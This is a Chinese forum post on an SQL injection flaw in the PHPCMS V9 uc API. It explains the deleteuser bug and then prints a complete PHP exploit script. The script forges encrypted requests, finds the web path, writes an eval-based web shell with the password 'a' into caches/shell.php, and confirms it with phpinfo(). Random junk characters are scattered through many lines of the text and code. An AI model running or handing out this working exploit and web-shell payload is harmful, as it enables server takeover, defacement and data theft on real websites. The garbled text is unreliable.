PHPCMS V9 uc API SQL注入漏洞

admin

PHPCMS V9版于2010年推出，是应用较为广泛的建站工具。第三方数据显示，目前使用PHPCMS V9搭建的网站数量多达数十万个，包括联合国儿童基金会等机构网站，以及大批企业网站均使用PHPCMS V9搭建和维护。
9 r$ \; B- S. U* @- ^9 I/ _$ {: p
/ s9 B/ _3 R2 b; P3 J# K- Z4 M所有使用PHPCMSV9搭建的网站均存在SQL注入漏洞，可能使黑客利用漏洞篡改网页、窃取数据库，甚至控制服务器。未启用ucenter服务的情况下，uc_key为空，define('UC_KEY', pc_base::load_config('system', 'uc_key'));deleteuser接口存在SQL注入漏洞。若MYSQL具有权限，可直接get webshell。

漏洞分析：
1.未启用ucenter服务的情况下uc_key为空
define('UC_KEY', pc_base::load_config('system', 'uc_key'));
2. deleteuser接口存在SQL注入漏洞，UC算法加密的参数无惧GPC,程序员未意识到$get['ids']会存在SQL注入情况。
    public function deleteuser($get,$post) {
  r% j" ~. t9 i% M0 J+ L        pc_base::load_app_func('global', 'admin');
        pc_base::load_app_class('messagequeue', 'admin' , 0);
        $ids = new_stripslashes($get['ids']);
        $s = $this->member_db->select("ucuserid in ($ids)", "uid");
0 T, _& H' q) n& fSQL语句为
1 \) f3 c; l( ?2 m8 O# y0 bSELECT `uid` FROM `phpcmsv9`.`v9_sso_members` WHERE ucuserid in ($ids)
: C" Q* s  n% G
/ X$ g) f$ o6 i9 r4 t3 l利用代码，随便拼了个EXP，找路径正则写得很挫有BUG，没有注其他表了，懒得改了，MYSQL有权限的话直接get webshell
<?php
print_r('
& d& T. Z+ P; I- V$ x; ^! {! S% I& h* `---------------------------------------------------------------------------
: Q/ h( f9 r6 E. n; xPHPcms (v9 or Old Version) uc api sql injection 0day
9 o4 o- G. H$ Z3 x; N# V+ sby rayh4c#80sec.com
, d2 d. Z8 e+ p% m; K4 w---------------------------------------------------------------------------
');
2 @" r" @6 n! t
/ H4 D7 I7 o& B; J, wif ($argc<3) {
    print_r('
---------------------------------------------------------------------------
, @' c  s! S8 b; [6 ^6 \: y% A4 h+ N! }$ ^. LUsage: php '.$argv[0].' host path OPTIONS
host:      target server (ip/hostname)
# ~6 G9 p% K& F, l# e; apath:      path to phpcms
3 S  E( p) u- @% a6 Z% nOptions:
-p[port]:    specify a port other than 80
-P[ip:port]: specify a proxy
3 g! l1 J  O: `! XExample:
php '.$argv[0].' localhost /
+ U& j& ~1 `9 }# Tphp '.$argv[0].' localhost /phpcms/ -p81
6 P4 O, W" `2 l3 }" g1 aphp '.$argv[0].' localhost /phpcms/ -P1.1.1.1:80
; }6 r3 U7 c- V) q4 S2 _8 M. C---------------------------------------------------------------------------
');
2 }- z2 ~7 q! i: g: J    die;
}

error_reporting(7);
ini_set("max_execution_time",0);
$ {4 p$ {- |. R& ?2 v! W9 Bini_set("default_socket_timeout",5);

! v9 J# F+ f0 F) s7 x$ k) F, L( x6 Qfunction quick_dump($string)
  H( T8 {. c" |9 d, o: Y{
  $result='';$exa='';$cont=0;
  for ($i=0; $i<=strlen($string)-1; $i++)
  {
   if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
6 {0 X  r4 o5 s/ v: c2 H   {$result.="  .";}
   else
  H3 G) _% w. T; ]- j   {$result.="  ".$string[$i];}
( S/ `* V, ?8 h' v# B   if (strlen(dechex(ord($string[$i])))==2)
% ?& t" ^* u5 ^/ z# s) w   {$exa.=" ".dechex(ord($string[$i]));}
8 e5 K( u2 d9 }   else
   {$exa.=" 0".dechex(ord($string[$i]));}
! Y. s( B1 G$ L8 j   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
. g. ~# ]0 y+ Z* w) [4 s; ~4 {  }
, D/ S& i) E3 n) _1 }' } return $exa."\r\n".$result;
, m$ Q4 B9 d; q1 m6 Q+ G9 s4 w}
- S& U& z& u9 G& C$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';

function send($packet)
{
0 A; B" C( X9 C9 o$ O2 g  global $proxy, $host, $port, $html, $proxy_regex;
" W" D1 p* r( ?  if ($proxy=='') {
7 ]% v+ k4 a9 [7 O  x0 M    $ock=fsockopen(gethostbyname($host),$port);
    if (!$ock) {
      echo 'No response from '.$host.':'.$port; die;
- l7 S/ X4 u: |7 Q0 g    }
  }
  else {
0 E4 ~& {8 X4 c9 A! Z% y- J        $c = preg_match($proxy_regex,$proxy);
    if (!$c) {
      echo 'Not a valid proxy...';die;
4 k5 k( f0 z5 k3 Y- ?( ~' s( a" _    }
    $parts=explode(':',$proxy);
# e8 f6 G# Z3 E/ C1 E2 z    $parts[1]=(int)$parts[1];
- |9 Z* t: A9 G- k5 I$ a    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
    $ock=fsockopen($parts[0],$parts[1]);
, a3 C3 r/ I6 b& g    if (!$ock) {
; ?+ i2 X/ X; ~5 Y( B& j  K3 o      echo 'No response from proxy...';die;
        }
  }
  fputs($ock,$packet);
6 v- D/ o/ s- f2 W2 P2 P  if ($proxy=='') {
, r; X/ |5 e" K( u# u    $html='';
' i4 x1 U/ q* b1 `" V' A    while (!feof($ock)) {
      $html.=fgets($ock);
    }
7 g" O- z# O. W: p8 [" W  }
  else {
. |5 H, Y1 O" O    $html='';
    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
      $html.=fread($ock,1);
& l3 b' n: C8 P    }
! H4 A, h: z0 U0 G! K  }
9 X* @$ e4 R; E  fclose($ock);
/ c& V! ?" h4 _$ C2 K: P' s% S}
9 |& d8 G0 g* D* Q8 \
2 ]% @7 A% K5 B( a3 x$host=$argv[1];
% U7 p. Z" d+ u& l, v, F  D$path=$argv[2];
* V: E; }6 O7 ^( S2 `" H1 }+ |$port=80;
$ c, ?6 q7 m# ^- T- y# d7 T$proxy="";
for ($i=3; $i<$argc; $i++){
' W8 V  e$ ~9 ?9 U, R( l' n$temp=$argv[$i][0].$argv[$i][1];
if ($temp=="-p")
{
8 a1 G. t! W+ K4 A$ ^  $port=(int)str_replace("-p","",$argv[$i]);
& B% ?9 k' u! X" F# B}
. }/ N9 y* a' M; c9 _if ($temp=="-P")
{
  $proxy=str_replace("-P","",$argv[$i]);
) M0 p; L. b: W: E( X}
}
9 M5 L! _9 c9 O
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}

function authcode($string, $operation = 'DECODE', $key = '', $expiry = 0) {

; X6 ^2 J% z5 l4 ]    $ckey_length = 4;
2 B1 K, T- ~' t, L
    $key = md5($key ? $key : '');
$ i4 b1 q6 M) U. H( X    $keya = md5(substr($key, 0, 16));
; f8 Y5 D* X4 v/ |    $keyb = md5(substr($key, 16, 16));
    $keyc = $ckey_length ? ($operation == 'DECODE' ? substr($string, 0, $ckey_length): substr(md5(microtime()), -$ckey_length)) : '';
+ h! ]! ]5 g- h4 z
( ]! A2 h* P) S) w! w4 W6 f; `    $cryptkey = $keya.md5($keya.$keyc);
4 {2 y. S' y- ?    $key_length = strlen($cryptkey);

% O: p7 `7 c: G# n    $string = $operation == 'DECODE' ? base64_decode(substr($string, $ckey_length)) : sprintf('%010d', $expiry ? $expiry + time() : 0).substr(md5($string.$keyb), 0, 16).$string;
* S+ y2 c" t  \6 L3 ]    $string_length = strlen($string);

3 R# r* d! l* n' Z6 |. U    $result = '';
6 h5 ~' D& M3 ~% k    $box = range(0, 255);
8 V+ o3 B3 E  {; f: J- E1 r$ k" f
    $rndkey = array();
    for($i = 0; $i <= 255; $i++) {
        $rndkey[$i] = ord($cryptkey[$i % $key_length]);
- |8 G  g3 D) U5 n    }

3 F0 r0 d+ _) u" F    for($j = $i = 0; $i < 256; $i++) {
        $j = ($j + $box[$i] + $rndkey[$i]) % 256;
& l& q9 r; F8 W        $tmp = $box[$i];
8 b9 J0 T+ Y2 w7 b        $box[$i] = $box[$j];
        $box[$j] = $tmp;
    }

    for($a = $j = $i = 0; $i < $string_length; $i++) {
9 F, G1 s; n6 {( g0 I        $a = ($a + 1) % 256;
+ ?; |& Y# {9 L3 b+ }# a( R        $j = ($j + $box[$a]) % 256;
        $tmp = $box[$a];
        $box[$a] = $box[$j];
: K: M; ~" Y. |3 `: b6 G        $box[$j] = $tmp;
        $result .= chr(ord($string[$i]) ^ ($box[($box[$a] + $box[$j]) % 256]));
# M" A9 C, n2 \# s    }

    if($operation == 'DECODE') {
        if((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() > 0) && substr($result, 10, 16) == substr(md5(substr($result, 26).$keyb), 0, 16)) {
            return substr($result, 26);
0 V) k0 G, p9 N( c        } else {
            return '';
        }
    } else {
        return $keyc.str_replace('=', '', base64_encode($result));
    }

) ^" ?& m4 G0 L8 C3 q& G}
+ j8 v4 ?; W7 M8 b# Z) ~
$SQL = "time=999999999999999999999999&ids=1'&action=deleteuser";
( g: Z. k' g, z; d  y+ [( E7 c5 a$SQL = urlencode(authcode($SQL, "ENCODE", ""));
echo "[1] 访问 http://".$host.$p."phpsso_server/api/uc.php?code=".$SQL."\n";
9 m: ^( A$ S0 r( c6 I$packet ="GET ".$p."phpsso_server/api/uc.php?code=".$SQL." HTTP/1.0\r\n";
$packet.="User-Agent: Mozilla/5.0\r\n";
$packet.="Host: ".$host."\r\n";
  N  R& Q3 g# p. A2 o5 ]$packet.="Connection: Close\r\n\r\n";
4 ~/ V3 {' p. }3 ]# ^send($packet);
if(strpos($html,"MySQL Errno") > 0){
echo "[2] 发现存在SQL注入漏洞"."\n";
  w# ?7 d2 |" [7 I& Decho "[3] 访问 http://".$host.$p."phpsso_server/api/logout.php \n";
$packet ="GET ".$p."phpsso_server/api/logout.php"." HTTP/1.0\r\n";
$packet.="User-Agent: Mozilla/5.0\r\n";
0 r8 W6 A; X$ r! o& y/ Q% }% x$packet.="Host: ".$host."\r\n";
) j9 b$ ?' I" R5 _, P$packet.="Connection: Close\r\n\r\n";
& Y6 y3 b7 T, E$ y8 l+ ]send($packet);
/ \% w% [0 L+ jpreg_match('/[A-Za-z]?[:]?[\/\x5c][^<^>]+[\/\x5c]phpsso_server[\/\x5c]/',$html, $matches);
//print_r($matches);
% E+ |9 S9 `3 `- N- sif(!empty($matches)){
echo "[4] 得到web路径 " . $matches[0]."\n";
echo "[5] 尝试写入文件 ". str_replace("\\","/",$matches[0]) ."caches/shell.php"."\n";
$SQL = "time=999999999999999999999999&ids=1)";
) R4 r/ j; \9 g( |' N" D; a$SQL.=" and 1=2 union select '<?php eval($"."_REQUEST[a]);?>' into outfile '". str_replace("\\","/",$matches[0]) ."caches/shell.php'#";
$SQL.="&action=deleteuser";
. L$ |: l& \8 x, A* }/ |$SQL = urlencode(authcode($SQL, "ENCODE", ""));
echo "[6] 访问 http://".$host.$p."phpsso_server/api/uc.php?code=".$SQL."\n";
/ D: k8 I1 T$ @8 k4 V: w# [5 ?$packet ="GET ".$p."phpsso_server/api/uc.php?code=".$SQL." HTTP/1.0\r\n";
# _8 U6 I1 t9 S, `) d$packet.="User-Agent: Mozilla/5.0\r\n";
/ |) S2 }. M7 @, y1 [' g- D$packet.="Host: ".$host."\r\n";
- L, }6 ?. F8 s0 H+ v1 Y% D' _0 R$packet.="Connection: Close\r\n\r\n";
9 y4 D6 Y- K4 e( v# L- msend($packet);
if(strpos($html,"Access denied") > 0){
echo "[-] MYSQL权限过低 禁止写入文件 ";
* I% s$ B. }+ a; ]5 n# Ddie;
3 N6 C) y) _; f2 Q! e' X}
echo "[6] 访问 http://".$host.$p."phpsso_server/caches/shell.php"."\n";
$packet ="GET ".$p."phpsso_server/caches/shell.php?a=phpinfo(); HTTP/1.0\r\n";
$packet.="User-Agent: Mozilla/5.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
7 c: W$ q+ d; f1 u' Z! @+ v. b( Gsend($packet);
$ y& u: B" r: l2 H4 Oif(strpos($html,"<title>phpinfo()</title>") > 0){
echo "[7] 测试phpinfo成功！shell密码是a ! enjoy it ";
" T& N% g8 c! ^5 Q}
" i/ M3 L$ R& K! K4 v' w. v$ E4 V}else{
. o) n; j! U3 ~; C! R0 Kecho "[-]未取到web路径 ";
}
}else{
echo "[*]不存在SQL注入漏洞"."\n";
}

: w! [9 z  l' g3 {' N3 N4 |?>